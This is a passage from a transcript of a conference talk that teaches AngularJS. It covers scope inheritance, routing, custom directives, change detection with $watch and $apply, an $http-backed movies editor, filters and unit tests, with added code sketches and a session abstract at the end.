about the scope is when it goes looking for name, it's literally looking for a property name that is defined on the scope that was set up by that controller. But this scope, when you have things inside of each other, the scope controlled here inherits from the prototypes, inherits from the scope that's set up by ng application. And that means if we were to not define a name here and instead have the name defined here, JavaScript will find that, right? There's some things in Angular where you just have to be very familiar with pieces of JavaScript. 
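A sketch of the controller registration just described, assuming it lives in a separate file that re-opens the already-created module; the controller name's exact casing is an assumption.

    (function () {
        var app = angular.module("myApp");          // no second argument: look up the existing module

        var NumbersController = function ($scope, $log) {
            $log.log("numbers controller is up and running");
            $scope.name = "Scott";
        };
        NumbersController.$inject = ["$scope", "$log"];

        app.controller("numbersController", NumbersController);
    }());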
So if you're not familiar with prototypal inheritance in JavaScript, you might want to read up on it. There's a great article out here that I wrote a number of years ago called prototypes and inheritance in JavaScript. If you Google for that, you'll find it. I'm not trying to plug myself. Just saying it's out there, and I think it's pretty good. But it'll explain to you that when JavaScript walks up to this scope object and it says, please give me the name property, what the JavaScript runtime will do is look in that scope, not find a name. So it follows the prototype reference which Angular has set up to point to this scope. So it'll go to that object and say, please give me a name. And there it'll say, yes, we have a name. So it takes that value, puts it on the screen. So if I run this now, even though we don't have scope.name in the controller, since we are asking for something called name, that should be found. And it should be the app. So where does this become really interesting? Let's take this controller or this block of markup. And what we'll do is we'll have a numbers controller inside of a numbers controller. And I'm also going to take this little bit of markup and put it outside of here. Control K, control D to do some formatting. So think about this for a second. When it looks for name here, where is it going to go? It's going to go to the app because that's the abstraction that's in control of everything inside the body element. When it looks for the name here, it's going to look for this numbers controller that was instantiated. When it looks for this name, it's going to look for it in this numbers controller that was instantiated. But since none of the numbers controller defined a name right now, if I type something up here like this is the app, they're all picking up essentially the same name property, right? This particular text box is saying give me the name, doesn't find it there, follows it to the next scope, to the next scope, eventually hits that name in the root scope. Where it gets tricky, if you ever get in this nested controller situations when someone does this. So what happens there? Well in JavaScript, when you write to an object, you never write into the prototype. So when I put something in the input here, Angular is saying, oh, I have to set the name on the scope. So it literally sets the name on the scope of this numbers controller and that effectively hides the one that's in root scope. We might be off in the weeds right now, but we'll circle back to real stuff. This is the kind of stuff that you might run into that just seems very confusing at first. And the same thing happens here. This is the inner controller. So it now has its own scope with its own name property. It's completely dissociated from those other two. So at the risk of doing something very odd now, let me just show you how this is slightly different. If I say root scope has a person object that is an object that has a name property. And let's see how this is different. So instead of root scope.name, I have root scope.person.name. And I do have to change my data binding expressions a little bit. So these can be very rich. You can have greater than and less than comparisons and work with arrays and regular expressions. It's not a full, it's not the complete JavaScript language inside of here. It's just a subset that Angular knows how to parse and evaluate. But this is person.name and this is now person.name. And let me see if I can just copy and paste those so I don't have to type too much. 
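A plain-JavaScript sketch of the prototype behaviour being relied on here — this is not Angular code, just the lookup and write rules that make nested scopes act the way the speaker describes.

    var rootScope  = { name: "the app" };
    var childScope = Object.create(rootScope);     // roughly what Angular does for a nested scope

    console.log(childScope.name);                  // "the app" - reads walk up the prototype chain

    childScope.name = "typed into the inner input";
    console.log(childScope.name);                  // the new value, now stored on the child itself
    console.log(rootScope.name);                   // still "the app" - the write never reached the parent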
So person.name, person.name, ctrl-k, ctrl-d. All right, same situation, but instead of going to the name property, we go to person.name. And now, when I refresh, if I come into this innermost controller, it controls everything. So if you can understand what's happening behind the scenes there, then you'll be perfectly prepared to work with Angular. But essentially, when I type inside of here, Angular is saying, oh, I need to update person.name. So go to this scope, find the person property, which isn't here. It's not here. It's in the application. Find that person property, get that object, and set the name. So now we are setting stuff in root scope. Pretty fascinating, isn't it? Just want to make you aware of scope and how they inherit and how they work in relationships like this. All right, but that's kind of enough weird stuff about Angular. I think what I wanted to show you next was something a little more realistic. These are my notes, which is, oh, yes. So typically, this is not the type of thing that people write. Typically, we're trying to build a single-page application. So we will, once I have valid HTML, include a new directive, which is data-ng-view. So this directive tells Angular that here's a DOM element where you can load the current view that should be in effect. I have two views defined in this application. Well, I have the markup defined. I don't have them loaded in yet. But if I refresh right now after I save this, refresh, there's nothing on that page, but I have numbers and I have movies. Nothing displays. What I need to do with Angular is tell it that when someone comes to hash slash numbers, load the numbers view into there, when someone comes to hash slash movies, pretend that said movies, load the movies view. So to do that, we need to add some configuration to our application. So I'm going to write a config function that is a function that takes another Angular service known as the route provider. And without route provider, I can say when someone comes to slash numbers, what I want you to do is load my email. Now, load views. I think I called it numbers.html. And you can also specify a controller. So you could wire up the controller right here. But basically, I'm saying come to this URL, go out, grab this HTML, put it into that DOM element where I had the ng view defined. And I could do the same thing with movies. So when someone comes to movies, please go to this template URL, which is views movies.html. And I can also say otherwise, if there are some strange URL that you don't recognize, please just redirect them to numbers. I think that's right. And then I have to register this config function. I should also annotate it, decorate it so that we tell everyone that it needs a route provider. But I'm not minifying right now. So let me just do an app.config. Here's a configuration function to execute when you load this module up. Let me see if any of this works. Do a save all, refresh this page. Yeah. So there's numbers. There's movies. We're going to have to fill in the code for these pages to work. And if someone comes to blah, it redirects to numbers. So that seems to work good. And of course, the advantage to this is Angular manages the browser history. So as people are navigating between things and you hit the back button, they actually go back to the previous view and things like that. Oh, and so one thing it's not doing right now is it's kind of an abrupt transition between these two. 
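A sketch of the route configuration being described; the template paths and redirect come from the talk, the rest is illustrative. Note that in the Angular version of this era $routeProvider ships in the core module; in later 1.x releases routing moved into the separate ngRoute module, which would then also need to appear in the module's dependency list.

    var config = function ($routeProvider) {
        $routeProvider
            .when("/numbers", { templateUrl: "views/numbers.html" })   // a controller could be wired up here too
            .when("/movies",  { templateUrl: "views/movies.html" })
            .otherwise({ redirectTo: "/numbers" });
    };
    config.$inject = ["$routeProvider"];
    app.config(config);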
What they added fairly recently in Angular is the ability to kick off animations when certain things happen. So that looks something like data-ng-animate equals, and then it's like passing a JSON object: when this view raises the enter event, I want you to run the animation view-enter. And I think that has to be in single quotes, but we'll find out. Let me see if this works. Refresh. Yeah. So when I go to movies, it sort of glides in. Numbers glides in. Very good, right? You could just do that all day. I'm not a UI person. So how does this work? View-enter. One of the great things about Angular animations is on CSS3-capable browsers, you can just use, here we go, CSS3 animation. So view-enter is going to be a class that Angular applies that we're going to transition everything. We're going to start it off invisible, to the left a little bit. And when that thing becomes active, it will be in the proper position and it will be completely opaque. But it will do it with this easing function specified by a Bézier curve with those points. So you can find lots of examples on that. ngAnimate. All right. So here's what we have to do. We have our views loading. And that's sort of one way to break down a complex application into smaller pieces, right? I'll put things inside of different views. Then inside of a view itself, let me load up one of these views. Let's load up the numbers view. Inside of one of these views, you can also encapsulate some HTML. Let me format this up a little bit. Eventually we're going to have some numbers in here. We're going to handle a click event. What I want to do right at this moment is just show you that you can do a div with another directive, ng-include, to say what I want you to do is go out and inside of this div load up a view. I think I called it greeting.html. Let's look at that file real quick. So what I'm telling Angular is for this div, there's actually a partial view out there called underscore greeting.html. Please load that up. Stick it into the page here. That view, partial view, can use data binding expressions to get evaluated against the scope of your controller. So it should display person.name. If I refresh all this, we get hello, the app. That's another way to sort of break things down. But I want to talk about something else, something that's very powerful in Angular, something where you can build a custom directive. So instead of ng-including a partial view, what I would like to do is build something where I can say div my-greeting and have it figure out how to display a name or something like that on the page. So in order for this to work, I'm going to have to define something that is registered with Angular so it knows how to display my-greeting. So we'll come back into our script. Let me just do a couple other things. Let's actually remove person from up here. Because typically people don't want to mess with root scope too much. You put something in root scope, since all the other scopes inherit from it, it's almost like a global object. It's almost like the global namespace. We'll just keep that in the numbers controller where it's just scope and put something more reasonable here. There we go. So let me write a custom directive. Again, I'll put it in its own little function here. Copying, pasting to avoid typing so much. Always a clue that you could do something better. But myGreeting is going to be a function that ultimately I have to register with this module.
So here's a custom directive called myGreeting that when someone uses it, Angular will call this function. And so there's a bit of a naming convention here. When you camel case something in JavaScript, like myGreeting with no dashes and a capital G, that's what Angular goes looking for when it sees my-dash-greeting in the markup. That's how these things work. And if you look in the Angular source code, angular.js, there'll be a directive in there with a function ngClick, not ng-click. So it sees data-my-greeting, it'll go looking for a directive, myGreeting, like this. And what we can do from here is we return an object where you can set a number of different properties to influence how this directive is going to behave. So today, we only have so much time, I'll be able to show you about 20% of what's possible with directives. They're extremely powerful. I'll just show you a subset of things that can be done. I just want you to know there's a lot more that could be done. One thing you could do is still use a template URL. So I could say when someone's using that directive, go out to the views and load up greeting.html. And if I did everything correctly here and refresh, yes. Then we just load that up and it says hello, Scott. But if that's all you're going to do, you might as well just use ngInclude, right? Just include the partial view. So we'll do something a little more advanced. Oh, but before I do that, there's a couple of different syntaxes that you can use for these directives. This is the attribute syntax. This would be the class syntax. Angular can actually look inside of a class and say, oh, I know what my-greeting is. You must want a directive there. And you can also do custom HTML elements, like a my-greeting element. Some people don't like that because HTML5 validators won't like it. Let's just see if that works. It doesn't work yet because by default, Angular only looks at attributes, I believe. When we register the directive, we would also have to tell it, pass in something called restrict. Make sure I spell it. I want attributes and elements. So we have two of those. I want attributes, elements, and classes. Now all three of them display. And there's also a way to do it with HTML comments, so: attributes, elements, classes, and comments. But I really just need one thing here. So let me go back to just using that one. And let's get rid of the template URL. We want to do something a little more powerful. I'm going to provide a link function. So a link function, link, is a function that Angular will invoke when it's recognized that directive, when it's gotten the reference to that DOM element. It will take that DOM element, pass it to your link function, along with a scope, and the element, and the attributes that are on that element. So one thing I could do here is say element.text, hello. Just to make sure this is working. Uh-oh. That's supposed to be a semicolon. Did I switch languages? There we go. All right. We got hello. So that's not very interesting. What I want to be able to do is set element.text to some sort of expression that you give me in the directive, so that I know what you're trying to display. So let me say, I want to say hello and someone's name. But you have to tell me the object that has the name property. So I could say data-my-greeting equals person, right? The person that's on the scope. Data-my-greeting person. And so one crude way to do this would be to say, okay, the name I want to display is equal to scope.
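A minimal sketch of this first, crude version of the greeting directive: it assumes the attribute names an object on the scope that has a name property, exactly as described, before $parse and watches come into the picture.

    var myGreeting = function () {
        return {
            restrict: "AEC",                        // attribute, element, or class usage
            link: function (scope, element, attrs) {
                // usage: <div data-my-greeting="person"></div>
                // attrs.myGreeting is the string "person"; scope[...] digs the object out of the scope
                element.text("Hello, " + scope[attrs.myGreeting].name);
            }
        };
    };
    app.directive("myGreeting", myGreeting);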
So the scope object will have, that'll be my scope with the model inside of it. I want to get to attributes.myGreeting. Yes, myGreeting. All right. Index into the scope using myGreeting. So what is the value of this? Attributes will literally contain all of the attributes that were on that DOM element. So if I ask for attributes.myGreeting, that should give me person. And once I have a reference to that object, I should be able to say name. And now I should be able to say hello plus name. Let's see if that works. Oops, let's see, what did I miss? Cannot read property name of undefined. That is because, sorry. Yeah, scope sub attributes.myGreeting should give me the person. And then we should be able to get the name. Let's see what happens if we put a breakpoint right here. I'm missing something obvious. So if I say scope sub attributes. I'll blow this up here in a second so we're going to see it. Oh, what is attributes.myGreeting? So something wasn't set. Oh, because I didn't save numbers.html. Unsaved file. Save it. Cross fingers. Refresh. Run. There we go. Hello, Scott. Is that interesting? Not entirely. What if? So one of the things you want to do with a directive is sort of decouple yourself from the model as much as possible. This directive now is assuming that you're going to give me an object that has a name property. But what if I just want you to give me the name? Just give me an expression that gives me the name that I can then use to set the element.text. Well, then I could say, okay, let's use my-greeting equals person.name. Save the file. Which I know, if I tried to use this syntax with a real expression like that, this is going to break, because this will look inside of scope for a property called person.name. It won't look for person and then do a dot name. It'll look for person.name, right, on that object. So trying to run this, we'll probably get back undefined. Let me get rid of that breakpoint. Yeah, undefined. So I need something from Angular that will actually understand what person.name is and give me something that I can evaluate. Well, fortunately, there's another service in Angular called the parse service. The dependency injector can inject it into the myGreeting function when it's setting up this directive. So I will need to take that parse service and save it off here in something that gets closed over. So I could say, before we return that object, parse equals that parse service. One of the things I can do with parse then is I can say, give me an expression by parsing attributes.myGreeting. And what I can do with the expression then is invoke it, passing in the scope object. And that should dig the name out for me without me having to figure out if there's dots in that thing or not. So refresh, we're back to hello, Scott, which is good. The problem with this is that hello, Scott is written once, when the link function runs. And now if someone is updating that model, that is, updating person.name, my directive is not written in a way that it's recognizing any model changes. That's something else that you need to do from inside of a directive. You have to tell Angular what you actually need to observe or watch, so that when it changes, you can update your display accordingly. So actually it turns out to be fairly easy. I can say, dear Angular, I want to watch this expression. And when it changes, you can call this function for me and pass in the new value. I'll talk about this here in a second once I get everything put in place.
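A sketch of the $parse-based version of the link function being described; it no longer cares whether the attribute value is "person" or "person.name".

    var myGreeting = function ($parse) {
        return {
            restrict: "A",
            link: function (scope, element, attrs) {
                var expression = $parse(attrs.myGreeting);      // e.g. "person.name"
                element.text("Hello, " + expression(scope));    // evaluate it against this scope
            }
        };
    };
    myGreeting.$inject = ["$parse"];
    app.directive("myGreeting", myGreeting);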
And let's change this to I am watching something. I think that's right. Not using the expression, but I'm going to leave that there because we might need it later. Refresh the page. I am watching Scott. Alan. So now we're updating appropriately. So Angular changed detection a little bit different than some of the other frameworks that are out there. If you use knockout and backbone and some of these other ones, when your model changes, the properties on those model objects have to be observable. They have to essentially raise events that broadcast to the world that, hey, this value just got set. Now someone can go out and update the DOM. Angular works a little bit differently in the sense that my JavaScript can be plain, unobservable objects. So what is person? It's just a regular JavaScript object with a name property. And what Angular will do is when you're using directives like ngModel and these expressions like x plus y, it will set up watches on those properties. And a watcher really is, let's look at the current value. Okay, we see what the current value is. We'll save that off. And now something has happened. Let's check the value again. Oh, it changed. We have to update the screen. So it's very much like snapshot change detection, which does influence some of the applications that you can write with Angular. The rule of thumb that the team came out with is that if you have a model with over a thousand things, a thousand properties, you might start running into performance problems because every one of those thousand things is data bound on the screen somewhere. There's a thousand watchers. There's a thousand comparisons that have to happen when it figures out what's changed. There's ways to optimize around that, but it's just something to be aware of. Someone emailed me recently with a page that had a table with 10,000 rows in it, and they were wondering why performance was slowing to a crawl. It's like, well, you're going to have to come up with a different solution for that one. Making sense? At all? Yeah, maybe? Well, I'm going to forge forward. So a couple of things happening then. Oh, yeah. So we have a directive that I can essentially bind something in my model, have it update the screen. It's two-way data binding. So what I want to do now is say, when someone interacts with this element, I want to actually modify the underlying model value. So with elements, I can bind to events. Now, I said earlier, we don't need jQuery, and that's because Angular actually includes an implementation of what they call jQuery Lite, which is a subset of the jQuery API, but it's all the things that you always use. Add class, remove class, dot bind, hookup events, dot text to set the text, dot HTML, all the stuff that you use for DOM manipulation in jQuery and selecting things. It's already provided by Angular. When you get one of these elements, it's essentially wrapped by jQuery Lite. That being said, if you include the jQuery library before you include Angular.js, it will use jQuery, the full jQuery library. So you'll have all that plus whatever else jQuery is providing. But element dot bind is a way to say, I want to hook up to the click event. So when someone clicks on this, what I want to do is add exclamation points or something at the end of the string just to make it look like it's doing something. So the way I can do that is through this expression, that expression knows how to assign values. 
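The watching version of the directive might be sketched like this (names assumed); the $watch listener runs whenever Angular's digest notices the expression's value has changed since the last snapshot:

```javascript
// Sketch: watching the expression so the directive reacts to model changes
// (module/directive names assumed).
var app = angular.module("app", []);

app.directive("myGreeting", function () {
    return {
        restrict: "A",
        link: function (scope, element, attributes) {
            // $watch takes an expression string; the listener receives the
            // new value each time the snapshot comparison detects a change.
            scope.$watch(attributes.myGreeting, function (newValue) {
                element.text("I am watching " + newValue);
            });
        }
    };
});
```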
So I'm going to say expression dot assign on the scope object, take this value and add an exclamation point. Right? So every time I click, I wanted to add an exclamation point into the model on the scope. So let me refresh the page. There's no errors. I'm going to click on this a few times. It doesn't seem to be updating. There's no errors. That's weird. Let me try to update something else on the screen, like this text box. Huh. Then all of a sudden all of my exclamation points appear. So this is something else to be aware of with Angular. There's two worlds of code when you're writing an Angular application. There's the world where code runs inside of Angular or Angular is aware that the code is running. There's something from Angular on the call stack. And then there's the world where Angular doesn't know that code is executing. This is a case where Angular doesn't know this code is executing because we're just saying, bind to click event. When someone clicks it, we're going to change the model. Angular doesn't know that that executed that it changed something, so it's not going out and doing any change detection. So push that on your mental stack just for a second. We're going to come back to this situation. Before we do, I just want to do a slightly simpler scenario, which is this numbers controller. I have an input for X and input for Y. This will show X plus Y. I want to have a button that when you click on it, it will just double X and double Y. Let's see how to implement that. That's changing the model too, but it's a little bit simpler than what we're doing. So over in the numbers controller, let's initialize some things. Scope.X, let's say it starts off as a 3. Scope.Y started off as 5. Scope.DoubleIt. So I'm saying when someone clicks this button, look for something on the current scope, in the current scope, called DoubleIt, and treat it like a function. So invoke it. So Scope.DoubleIt is a function that when someone invokes that, we will say Scope.X times equals 2. Scope.Y times equals 2. Let's just see if this works. Refresh the page. So we've got a 3 and a 4 and an 8. I can bump these up. That's worked. It's updating the screen. Change X. Double everything. Double X and Y, and that also updated that div out there. So all that works. When you're inside of code that Angular knows it was called, it does the change detection for you and everything just works. It knows that it had to call DoubleIt. And so as soon as your code executed because you wired up something here with an ngClick directive, as soon as you change something inside of that function, Angular will do the change detection, figure out how to update the screen. But if you execute code inside of here without going through Angular, it doesn't know that things change. So if I had an increment function, and I said inside of here we'll do Scope.X plus equals 1 and Scope.Y plus equals 1, and then we do a set timeout. Let's do a set timeout. So every, well, we'll start calling this after one second. And then just to make things a little bit dramatic after every 250 milliseconds we'll keep calling it. Run this. No changes appearing on the screen because set timeout is just calling that code increment function. Angular doesn't know that's happening. If I try to update something on the screen, like change X, oh yeah, I can see something's getting doubled, right? Why was way up there? Angular doesn't know that things are changing. 
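The numbers controller being described might look roughly like this sketch (controller, module, and property names assumed). The doubleIt path updates the screen because ng-click runs it inside Angular; the setTimeout path is the problem case where the model changes but no digest runs:

```javascript
// Sketch of the numbers controller described above (names assumed).
var app = angular.module("app", []);

app.controller("NumbersController", function ($scope) {
    $scope.x = 3;
    $scope.y = 5;

    // Wired to the button with ng-click="doubleIt()"; because Angular invokes
    // it, change detection runs afterwards and the view updates.
    $scope.doubleIt = function () {
        $scope.x *= 2;
        $scope.y *= 2;
    };

    // The problem case: setTimeout calls this outside of Angular, so the model
    // changes but nothing on screen updates until some other digest runs.
    var increment = function () {
        $scope.x += 1;
        $scope.y += 1;
        setTimeout(increment, 250);
    };
    setTimeout(increment, 1000);
});
```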
Instead of set timeout, what I should be using is another service in Angular, the timeout service that's basically a wrapper for set timeout. But it's through an Angular service. So again, it's about testability. You could fake that out in a unit test, make sure the controller was calling timeout for some reason. But now if I say let's use the timeout service to invoke that function, well, timeout does a little bit smarter and knows that things might change. And I think I also have to change my injection here. Or using timeout service. Let me refresh. So through the timeout service, things are changing. Angular knows that something was changed when it called that function back. Yeah. Pretty exciting, isn't it? You guys glad you came to the session. All right. Let me take this out so it doesn't become annoying. How do we do that? How do we do that from our own code? Well, when you're writing a directive and you're changing something in the model, you should always do one of two things. Either call apply after that is finished. That's the way of telling Angular, okay, code just executed. Probably made some changes. I need to you to go through and do your digest cycle and see what changed and update the screen appropriately. If you want to do it the really safe way, though, you can also invoke apply and pass in a function of the code that might change the value. The advantage to this being if that code that is changing stuff throws an exception somewhere along the line, Angular will still do its apply change detection stuff. Right. And update the screen. Save this. Refresh. Now let me click my directive. Now you can see it's actually updating appropriately. Right. So that's how you would change the model from a directive. So directives are really that piece of, they're like glue between the DOM and your model. The model for a controller should really never do any DOM manipulation. The model, the things that you put on scope, they're very much, you treat them like a view model if you've ever done silverlight or WPF development. They don't really know about the view. You just set properties on things. You write functions that modify things. And it's the data binding expressions and the directives that take care of pulling data out of there, modifying the DOM, wiring up click events in the DOM. You would never write DOM manipulation code inside of the controller, basically. And that means we should have at least one passing test inside of here. I'm hoping. Yeah, should double it, actually, is a passing test. Let me show you the test real quick. Don't know if we'll have time to cover these in much detail today, but a test for that controller for double it could look as easy as this. I want you to initialize X to 10 and if someone doubles it, I would expect it to be 20 after it's doubled. There's a little bit of setup code to get there. You basically have to instantiate the controller and provide maybe a fake for the timeout service, but they very much want you to be able to unit test your models and controllers. All right. Let's try to get through some material here. We have the numbers view working, I believe. We did the double it. We have the custom director right. So let's look at movies, which is a little more realistic scenario. So what I want to do here is have a movies controller that will, which we don't have yet, a movies controller that will go out and we'll call a web service that sits at slash api slash movies that returns some movie information in JSON. 
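Put into sketches, the two fixes look roughly like this (names assumed): the $timeout service in place of setTimeout in the controller, and scope.$apply wrapped around the model change in the directive's click handler:

```javascript
// Sketch: $timeout instead of setTimeout, so Angular runs change detection
// after each callback (names assumed).
var app = angular.module("app", []);

app.controller("NumbersController", function ($scope, $timeout) {
    $scope.x = 3;
    $scope.y = 5;
    var increment = function () {
        $scope.x += 1;
        $scope.y += 1;
        $timeout(increment, 250);
    };
    $timeout(increment, 1000);
});

// Sketch: the directive's click handler wrapped in scope.$apply. Passing a
// function to $apply means the digest still runs even if that code throws.
app.directive("myGreeting", function ($parse) {
    return {
        restrict: "A",
        link: function (scope, element, attributes) {
            var expression = $parse(attributes.myGreeting);

            scope.$watch(attributes.myGreeting, function (newValue) {
                element.text("I am watching " + newValue);
            });

            element.bind("click", function () {
                scope.$apply(function () {
                    expression.assign(scope, expression(scope) + "!");
                });
            });
        }
    };
});
```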
This is showing XML, but that's because I ran it through the browser, but it'll hit that end point, pull back some movies, display them in a table, allow me to edit them, let me save them. We need a movies controller to do that. So function. I need a reference again to angular. I'm going to put this in my app also. That's going to be my module. So my movies controller is a function that will take a scope. That's where I'll put my model. Also going to take another service called the HTTP service. You can write your own custom services, by the way, very easy to write, have them injected in to controllers and directives and other things like that. Typically what people would do, a lot of people wouldn't use dollar sign HTTP service directly from a controller. They would hide it behind their own custom service. There's a number of advantages to that, including caching. And sometimes it's easier to test that way. We're just going to use it right from the controller, just, well, in the interest of time. This is basically like dollar sign.ajax. HTTP has get, put post methods, JSONP method, I'm going to get API movies. It returns a promise. So I can say.then or.always or I believe there's a.air. Then after you have retrieved the movies, call this function with the result. What I want to do is take the data that comes back and put it into my scope. So scope.movies equals result.data. And let's check the view real quick. So the view is building a table. And then this is a big directive that you'll use quite often, the ng repeat directive. It's basically saying find the movies property on the scope. And essentially for each movie that you find in the movie's collection, actually repeat the following DOM elements. So basically, well, repeat these DOM elements. Repeat a table row for each movie that you find. And it sets up a new scope for each, one of those repeated DOM elements, where the movie, the single movie that pulled out is the scope. So when I say things like movie.id, movie.title, movie.release date, it should be pulling that out for each individual movie, putting it into a table cell there. Pretty good stuff, right? See if it works. Refresh this and I didn't save something. Still got an error, which is movies controller is not a function. Oh, right. So I bet I forgot a step. We wrote the movies controller function. I never told Angular about it. So dear module, there is a controller called movies controller. This is the function to use. We should annotate it for dependency injection, but we'll get to that. All right. So we got movies from my web service. Very good. It's very ugly display. What are some things we could do to improve this? Well, we could go into the view. And since I'm using bootstrap, I guess one thing I could do is say this is a table, table, hover, effects. That doesn't really matter. Table striped effects. Slightly better. Release date. Not pretty. How do I modify the release date so it's a pretty value? Here's another category of abstractions in Angular. Things called filters. Filters are things that you can pipe into. So I could say, please pipe this into a filter called date. And that date, I can give it a parameter. I want you to display a date with the year, a four-digit year. And you can also do month, year, whatever type of syntax you want. Do a save all here. Yeah. So we just have a four-digit year. 
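A sketch of that movies controller (the /api/movies endpoint and the names are assumptions here):

```javascript
// Sketch of the movies controller described above (names and endpoint assumed).
var app = angular.module("app", []);

app.controller("MoviesController", function ($scope, $http) {
    // $http.get returns a promise; when it resolves, put the JSON payload on
    // the scope so ng-repeat can stamp out a table row per movie.
    $http.get("/api/movies").then(function (result) {
        $scope.movies = result.data;
    });
});
```

In the view, ng-repeat="movie in movies" on the table row then repeats a <tr> per movie, binding movie.id, movie.title, and movie.releaseDate into the cells.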
So filters are a nice way of formatting things, keeping that code out of the model, keeping that code out of the controller, not having to change your API or the JSON that comes back. You just pipe things through a filter. They're also very easy to write. They're essentially a function that takes a value. And you modify the value and you return it. What else do we want to do here? We want to edit things. So when I click on the edit button, how do I edit this movie? This is already set up with an ng-click directive that says someone clicks the button, call this function, pass in the current movie that's in scope. So I just need to, in my controller, say scope.edit is a function that takes a movie. And it looks like this editing section, a couple different things going on. So first of all, there's an ng-show directive. That's a really easy way to turn a DOM element on or off. Basically, it looks at this expression on the current scope. And if it's truthy, it'll show it. If it's falsy, there's no DOM element. It'll hide it. So literally, when we're editing, if I say scope.editing equals true, that should turn that view on. Also looks like we are binding now against editMovie. So editMovie.title, editMovie.releaseDate. Let me say scope.editMovie equals that incoming movie that you just passed me. Let's see if this works. I'm going to edit Star King. I don't know how I came up with these movie names. They're ridiculous. So I'm editing that JavaScript object. I edit Star King over here. That's the same object as what's in the table. So you can see the data binding works to update the table, which might not be what I want. I might want to get a copy of that object so I can modify it and not update the table until the user is ready to commit that somehow. So I would probably do something like angular.copy. There's a copy, a deep copy helper method. angular.copy that movie. Now I should have a distinct copy of, let's say, Star Wars. So if I make changes over here, they're not going to be propagated over there until I click save. Let's see what the save button does. Save. It was just going to call a function called save and pass in the movie. There's also a cancel, which effectively stops the edit. Let's implement that stuff real quick. So scope.cancel is a function. I guess all I really have to do here is say scope.editing equals false. That should be enough where I should be able to say let's cancel it. Very good. And scope.save, that's a function where you give me the movie that you want to save. Ostensibly, I can do an $http.put there, put that movie back to the web server, tell it to save it in the database. I probably also want to update the movie that's in the table, which I guess if I had a library like underscore, it would be a little bit easier, because I guess the best way to do it right now is to say let's go through the movies that we have in the model. And when we find the movie that has the same id as that incoming movie, that's the one we want to update. So we'll break out of the loop. But here I could do angular.extend, which is a lot like jQuery.extend. Take this object and this object and move all the properties into it. Extend scope.movies sub i with that incoming movie, if I'm making sense. I hope I'm making some sense. Let's try to edit Star King. I have no idea if that's really a movie. Star King 2, save it. Uh oh. What did I miss? Movies is not defined. Uh, yeah, that's interesting. Oh, how did that sneak in there? Yeah, yeah, yeah, thank you. Now I see it.
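Filled in, the edit/cancel/save functions just described might be sketched like this (names and the endpoint shape are assumptions); the release date cell, meanwhile, just pipes through the date filter, something like {{movie.releaseDate | date:'yyyy'}}:

```javascript
// Sketch of the edit / cancel / save functions described above
// (names and the /api/movies endpoint are assumed).
var app = angular.module("app", []);

app.controller("MoviesController", function ($scope, $http) {
    $http.get("/api/movies").then(function (result) {
        $scope.movies = result.data;
    });

    $scope.edit = function (movie) {
        // Deep copy so edits don't show up in the table until saved
        $scope.editMovie = angular.copy(movie);
        $scope.editing = true;              // ng-show turns the edit form on
    };

    $scope.cancel = function () {
        $scope.editing = false;
    };

    $scope.save = function (movie) {
        // Push the change back to the web server (endpoint shape assumed)
        $http.put("/api/movies/" + movie.id, movie);

        // Copy the edited values onto the matching movie in the table
        for (var i = 0; i < $scope.movies.length; i++) {
            if ($scope.movies[i].id === movie.id) {
                angular.extend($scope.movies[i], movie);
                break;
            }
        }
        $scope.editing = false;
    };
});
```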
Hopefully that's the problem. Save it. Yes, thank you. So that would be an example of something that you could do with Angular that you'll notice is amazingly easy, right? That's a very complex page. It's showing things, hiding things, putting things on the server, retrieving things from the server. But it's all right here. It's relatively straightforward. It's also not too difficult to unit test. I haven't completely implemented the update movies the way it wants to be implemented. But just to show you some of the tests again. This is an example of, I expect after the movie controller gets instantiated, it should have made a call to the web server to get /api/movies. And I would expect after all the asynchronous stuff is done that the scope.movies.length, it'll have three movies in there. And I expect if I call scope.edit that it'll turn on the editing flag so that DOM element appears. So lots of interesting ways to write unit tests (there's a rough sketch of those tests below). And I think, let me just check something real quick. I think I covered 90% of what I wanted to show you today. So I'll just open it up for questions. We only have a couple minutes left. Well, if there's no questions. Ah, so the question is why Angular, not Knockout. It's a very personal decision, I believe. Some people use Knockout and they like it. Some people use Knockout and it just doesn't do it for them. I kind of fall into that category. The first time I tried Angular, honest to goodness, I looked at their examples and I saw things like ng-click, it turned me off and I disregarded it for about four months and then I came back to it. Actually went through their tutorial. So if you want another good tutorial on Angular, they have on the Angular web page here a link to a tutorial where you bring down the Git repository and you go through different steps that they have tagged and it'll show you how to build an application that has a master detail view. Very interesting. When I went through that, then that's when I said this is the one. It doesn't funkify stuff so you don't have to make your model observable. You don't have to do crazy things where, you know, every property becomes a function. I really like the data binding syntax. I like handlebars or mustaches, whatever you want to call them. I think it has a lot of flexibility with the directives. The downsides to Angular are the documentation is not that good. It is complex. If you haven't worked with inversion of control containers and dependency injectors and an MVVM type pattern before, it can all be quite overwhelming. But I think the simple cases are very simple. They're very easy to do. The hard cases where you have to build custom directives, that requires a little bit of work. So does that answer the question? I like it. So if you have any other questions, my email address is this and you can email me. I can give you the code that I wrote today and I have some Pluralsight cards. If you want to watch some Pluralsight videos, it's a free month's subscription. So a $30 value. Thank you for coming. Hope you enjoyed it.
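The controller tests mentioned above could be sketched with angular-mocks roughly as follows; the module, controller, and endpoint names are assumptions, and a real suite would also fake out the $http put on save:

```javascript
// Rough Jasmine-style sketch of the controller tests described above,
// using angular-mocks ($controller, $httpBackend); names assumed.
describe("MoviesController", function () {
    var $scope, $httpBackend;

    beforeEach(module("app"));

    beforeEach(inject(function ($rootScope, $controller, _$httpBackend_) {
        $httpBackend = _$httpBackend_;
        $httpBackend.whenGET("/api/movies")
                    .respond([{ id: 1 }, { id: 2 }, { id: 3 }]);

        $scope = $rootScope.$new();
        $controller("MoviesController", { $scope: $scope });
    }));

    it("loads movies from the web service", function () {
        $httpBackend.flush();                  // complete the fake async call
        expect($scope.movies.length).toBe(3);
    });

    it("turns on editing when edit is called", function () {
        $scope.edit({ id: 1, title: "Star King" });
        expect($scope.editing).toBe(true);
    });
});
```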
|
AngularJS is a JavaScript framework for building applications with HTML. In this session we'll explore the fundamental abstractions of Angular in the context of real application. We'll see how to use controllers, models, services, filters, directives, views, templates, and more.
|
10.5446/51504 (DOI)
|
